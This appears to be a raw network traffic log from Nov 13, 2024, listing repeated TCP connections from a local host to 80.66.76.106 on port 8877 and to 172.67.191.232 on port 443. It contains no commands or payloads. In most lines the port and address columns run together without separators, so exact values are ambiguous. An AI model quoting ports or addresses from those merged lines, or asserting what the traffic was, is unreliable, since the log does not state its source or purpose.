Nov 13, 2024 11:00:41.754915953 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.754915953 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.872483015 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.872555017 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.872592926 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.872627020 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.872680902 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.872714996 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.872749090 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.872781992 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.872778893 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.872778893 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.872821093 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.872872114 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.872872114 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.872872114 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.873871088 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.873904943 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.873941898 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.873941898 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.873959064 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.873992920 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.874006033 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.874027014 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.874030113 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.874059916 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.874078035 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.874094009 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.874099970 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.874149084 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.874183893 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.874217033 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.874221087 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.874221087 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.874221087 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.874258041 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.992835045 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.992893934 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.992932081 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.992934942 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.992934942 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.992997885 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.993182898 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:01:12.273261070 CET  49705  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:01:12.587358952 CET  49705  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:01:12.592381954 CET  8877   49705  80.66.76.106    192.168.2.8
Nov 13, 2024 11:01:12.592433929 CET  49705  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:01:12.592437029 CET  8877   49705  80.66.76.106    192.168.2.8
Nov 13, 2024 11:01:25.118254900 CET  58085  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:01:25.123188972 CET  8877   58085  80.66.76.106    192.168.2.8
Nov 13, 2024 11:01:25.123296022 CET  58085  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:01:25.123575926 CET  58085  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:01:25.128340960 CET  8877   58085  80.66.76.106    192.168.2.8
Nov 13, 2024 11:01:32.972527981 CET  8877   58085  80.66.76.106    192.168.2.8
Nov 13, 2024 11:01:32.972654104 CET  58085  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:01:32.973151922 CET  58085  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:01:32.977952003 CET  8877   58085  80.66.76.106    192.168.2.8
Nov 13, 2024 11:01:32.978008032 CET  58085  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:01:32.982848883 CET  8877   58085  80.66.76.106    192.168.2.8
Nov 13, 2024 11:01:51.033907890 CET  8877   58085  80.66.76.106    192.168.2.8
Nov 13, 2024 11:01:51.034327030 CET  58085  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:02:03.096438885 CET  58086  443    192.168.2.8     172.67.191.232
Nov 13, 2024 11:02:03.096501112 CET  443    58086  172.67.191.232  192.168.2.8
Nov 13, 2024 11:02:03.096558094 CET  58086  443    192.168.2.8     172.67.191.232
Nov 13, 2024 11:02:03.096884012 CET  58086  443    192.168.2.8     172.67.191.232
Nov 13, 2024 11:02:03.096894979 CET  443    58086  172.67.191.232  192.168.2.8
Nov 13, 2024 11:02:03.714534998 CET  443    58086  172.67.191.232  192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:03.714624882 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:03.747946978 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:03.747997046 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:03.748402119 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:03.751991987 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:03.752566099 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:03.795340061 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:05.734975100 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:05.735120058 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:05.735279083 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:05.747689962 CET58086443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:05.747708082 CET44358086172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:06.650965929 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:06.651071072 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:06.651571035 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:06.651870966 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:06.651891947 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:07.268204927 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:07.268279076 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:07.268759012 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:07.268771887 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:07.270546913 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:07.270551920 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:09.570720911 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:09.570785999 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:09.570822954 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:09.570884943 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:09.576571941 CET58087443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:09.576600075 CET44358087172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:09.662058115 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:09.662101984 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:09.662210941 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:09.663336039 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:09.663351059 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:10.281301975 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:10.283736944 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:10.291920900 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:10.291930914 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:10.295336962 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:10.295344114 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:12.418210983 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:12.418278933 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:12.420222044 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:12.440248966 CET58088443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:12.440263987 CET44358088172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:12.547938108 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:12.547980070 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:12.548075914 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:12.549000978 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:12.549016953 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:13.168234110 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:13.168298960 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:13.168693066 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:13.168698072 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:13.169651985 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:13.169656992 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:15.758476019 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:15.758550882 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:15.758552074 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:15.758939028 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:15.776212931 CET58089443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:15.776240110 CET44358089172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:15.862509012 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:15.862551928 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:15.862720966 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:15.863120079 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:15.863137960 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:16.481421947 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:16.484076977 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:16.485452890 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:16.485452890 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:16.485460043 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:16.485474110 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.443041086 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.443067074 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.443078041 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.443140984 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:19.443140984 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:19.443141937 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:19.491358042 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.491410017 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.491472006 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:19.491504908 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:19.495697021 CET58090443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:19.495712042 CET44358090172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.573832989 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:19.573863983 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:19.574023962 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:19.574364901 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:19.574372053 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:20.184325933 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:20.188076973 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:20.189424038 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:20.189424038 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:20.189433098 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:20.189481974 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:22.228959084 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:22.229016066 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:22.229074955 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:22.239542007 CET58091443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:22.239562988 CET44358091172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:22.358328104 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:22.358369112 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:22.359467030 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:22.359946966 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:22.359961987 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:22.999387980 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:22.999985933 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:23.043447018 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:23.043458939 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:23.044975996 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:23.044980049 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:24.993869066 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:24.993933916 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:24.993938923 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:24.993972063 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:25.009768963 CET58092443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:25.009795904 CET44358092172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:25.087730885 CET58093443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:25.087835073 CET44358093172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:25.087913990 CET58093443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:25.088192940 CET58093443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:25.088232994 CET44358093172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:25.685642958 CET44358093172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:25.685710907 CET58093443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:25.693715096 CET58093443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:49.899382114 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:50.269625902 CET88775809980.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:50.274003029 CET580998877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:02:50.510699987 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:50.512084961 CET58103443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:50.512665987 CET58103443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:50.512684107 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:50.513555050 CET58103443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:50.513567924 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:52.623966932 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:52.624031067 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:52.624118090 CET58103443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:52.627995014 CET58103443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:52.628017902 CET44358103172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:52.764416933 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:52.764527082 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:52.764795065 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:52.767998934 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:52.768043041 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:53.401137114 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:53.401221037 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:53.401969910 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:53.401983976 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:53.403017044 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:53.403023958 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:55.224709988 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:55.224766016 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:55.224777937 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:55.224812031 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:55.225178957 CET58104443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:55.225202084 CET44358104172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:55.749654055 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:55.749700069 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:55.749774933 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:55.750010967 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:55.750024080 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:56.354991913 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:56.355343103 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:56.357201099 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:56.357201099 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:56.357234001 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:56.357275009 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:58.374526978 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:58.374629021 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:58.374667883 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:58.378308058 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:58.382680893 CET58105443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:58.382702112 CET44358105172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:58.522171974 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:58.522275925 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:58.526490927 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:58.526490927 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:58.526578903 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:59.151068926 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:59.151141882 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:59.151607037 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:59.151627064 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:02:59.153003931 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:02:59.153014898 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:01.524415016 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:01.524477959 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:01.524502993 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:01.524585962 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:01.524657965 CET58106443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:01.524704933 CET44358106172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:01.611067057 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:01.611181974 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:01.611265898 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:01.611504078 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:01.611530066 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:02.234533072 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:02.236881018 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:02.236881018 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:02.236927032 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:02.243505001 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:02.243511915 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:02.290465117 CET580858877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:03:02.297291994 CET88775808580.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:02.299993992 CET580858877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:03:04.592155933 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:04.592250109 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:04.592358112 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:04.592505932 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:04.592556953 CET58107443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:04.592600107 CET44358107172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:04.675477982 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:04.675529003 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:04.675726891 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:04.676140070 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:04.676152945 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:05.299349070 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:05.299438953 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:05.300091982 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:05.300111055 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:05.301808119 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:05.301829100 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:07.619025946 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:07.619185925 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:07.619230032 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:07.619302034 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:07.619369984 CET58108443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:07.619411945 CET44358108172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:07.701107979 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:07.701220989 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:07.701471090 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:07.701587915 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:07.701617956 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:08.307857037 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:08.311583042 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:08.312755108 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:08.312755108 CET58109443192.168.2.8172.67.191.232
                                                                                                                                                          Nov 13, 2024 11:03:08.312786102 CET44358109172.67.191.232192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:03:08.312833071 CET44358109172.67.191.232192.168.2.8
